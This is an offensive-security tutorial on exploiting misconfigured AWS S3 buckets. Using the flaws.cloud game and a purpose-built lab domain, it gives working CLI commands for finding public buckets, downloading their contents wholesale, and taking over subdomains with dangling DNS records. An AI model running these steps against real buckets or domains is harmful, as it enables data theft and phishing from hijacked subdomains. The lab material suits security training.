S3 Bucket Kicking

Amazon Simple Storage Service (S3) is a very popular storage solution provided by AWS as part of its service offerings.

S3 storage uses ‘buckets’ as the unit of storage, with individual files and folders known as ‘objects’ within the bucket.

Since S3 buckets are used to store various types of data, these buckets may sometimes be misconfigured and allow excessive privileges on bucket objects to unauthorised external parties.

Recon

You can determine the site is hosted as an S3 bucket by running a DNS lookup on the domain, such as:

dig +nocmd flaws.cloud any +multiline +noall +answer
# Returns:
# flaws.cloud.            5 IN A  54.231.184.255

Visiting 54.231.184.255 in your browser will direct you to https://aws.amazon.com/s3/

So you know flaws.cloud is hosted as an S3 bucket.

You can then run:

nslookup 54.231.184.255
# Returns:
# Non-authoritative answer:
# 255.184.231.54.in-addr.arpa     name = s3-website-us-west-2.amazonaws.com

So we know it's hosted in the AWS region us-west-2

Side note (not useful for this game): All S3 buckets, when configured for web hosting, are given an AWS domain you can use to browse to it without setting up your own DNS. In this case, flaws.cloud can also be visited by going to

http://flaws.cloud.s3-website-us-west-2.amazonaws.com/

You now know that we have a bucket named flaws.cloud in us-west-2, so you can attempt to browse the bucket by using the aws cli by running:

aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2

If you happened to not know the region, there are only a dozen regions to try. You could also use the GUI tool cyberduck to browse this bucket and it will figure out the region automatically.

Finally, you can also just visit http://flaws.cloud.s3.amazonaws.com/ which lists the files due to the permissions issues on this bucket.

Its permissions are too loose, but you need your own AWS account to see what's inside. Using your own account you can run:

aws s3 --profile YOUR_ACCOUNT ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

Let us take a look at a couple of misconfiguration scenarios for S3 buckets:

Discovering Misconfigured Buckets

Potential Impact - Sensitive Data Exposure

In this scenario, we will go through the process of discovering misconfigured public buckets and take a look at how these buckets may be exploited and the data present within these buckets can then be exfiltrated.

There are multiple tools available for this purpose, for our use case we will be using the s3recon tool, which can be found here:

Prerequisites:

s3recon requires Python >=v3.6.

Installation:

pip install s3recon

Using pip directly to install a tool could result in broken packages, the better alternative would be to install pipx and install the tool using:

pipx install s3recon

Now that we have the tool ready, we must also provide a text file containing the keywords we need to look for.

So, if we need to search for public S3 buckets associated with Payatu, we might use the keyword ‘test’ and add it to the list:

echo "test" >> wrds.txt

Now that we have the name of a public bucket - test-staging, let’s see how we can exfiltrate data from this bucket.

For this, we’ll be using a tool called BucketLoot, which can be found here:

This newly released tool allows us to exfiltrate sensitive information from publicly exposed S3 buckets.

Prerequisites:

This tool requires Golang to be installed on the system. It can be found here.

Let’s install the tool using:

git clone https://github.com/redhuntlabs/BucketLoot.git
cd BucketLoot
go build

We can now run the tool to scan our S3 bucket using:

./bucketloot https://test-staging.s3.amazonaws.com

We can also use multiple options with the tool. For example, if we wanted to search for a specific keyword within the bucket, we could do so using

./bucketloot https://test-staging.s3.amazonaws.com -search <KEYWORD>

We can then download the file contents using:

aws s3 cp s3://<S3 OBJECT URL> ./

💡 Tip: In case you wish to download the entire bucket, you can add the --recursive flag to the command:

aws s3 cp s3://<BUCKET NAME> ./ --recursive

Subdomain Takeover via website hosted on S3

Potential Impact - Adversaries can take over a subdomain and use it for phishing attempts or to serve malicious content to unsuspecting victims.

S3 buckets are not only used to store data, but can also be used to host static websites. When a website is served via an S3 bucket, the DNS record for the domain must point towards the static website endpoint for the bucket.

Sometimes, when S3 buckets hosting static websites are deleted, the developers forget to remove the corresponding DNS records for the bucket.

A record which points towards a non-existent resource is known as a “dangling” DNS record.

Let’s look at how to take over a sub-domain if it has a dangling record pointing to an S3 bucket.

Whenever we are given a target domain, one of the first steps is to enumerate its subdomains. While there are multiple tools available for this purpose, we are going to utilize the knockpy tool here:

Prequisites

Python v3

Installation

git clone <https://github.com/guelfoweb/knock.git>
cd knock
python3 setup.py install

Knockpy can now be used directly as a CLI tool.

Now, to perform subdomain enumeration, we are going to need a wordlist containing possible domain names.

There are some great wordlists available for DNS brute-forcing over at h

We’ll be using the following words here:

Download it using:

git clone https://github.com/danielmiessler/SecLists.git

The target domain we’ll be using is cloudheck.site, which has been configured specially for this exercise. So, our knockpy command becomes

knockpy cloudheck.site -w ~/SecLists/Discovery/DNS/namelist.txt

We have found 2 sub-domains, app.cloudheck.site and ctf.cloudheck.site. We add the sub-domains to a list, called sublist.txt

Now, we need to check for sub-domain takeover vulnerabilities:

For that we’ll use the subdover tool which can be found here:

git clone https://github.com/PushpenderIndia/subdover.git
cd subdover
chmod +x installer_linux.py
sudo python3 installer_linux.py
chmod +x subdover.py
python3 subdover.py -l sublist.txt

We can now create an S3 bucket in our own account and takeover the subdomain.

Steps:

  1. Login to the AWS Console

  2. Access the S3 console at

    https://s3.console.aws.amazon.com

  3. Select “Create bucket”

  4. Create an S3 bucket with the exact same name as the target sub-domain:

  5. Deselect the “Block all public access” setting:

    1. Leave the rest of the settings as-is and click on Create bucket.

    2. Once the bucket is created, go to Properties, and enable Static website hosting

    3. Under index document, specify ‘index.html’

    4. { "Version": "2012-10-17", "Statement": [ { "Sid": "PublicReadGetObject", "Effect": "Allow", "Principal": "", "Action": [ "s3:GetObject" ], "Resource": [ "arn:aws:s3:::app.cloudheck.site/" ] } ] }

Last updated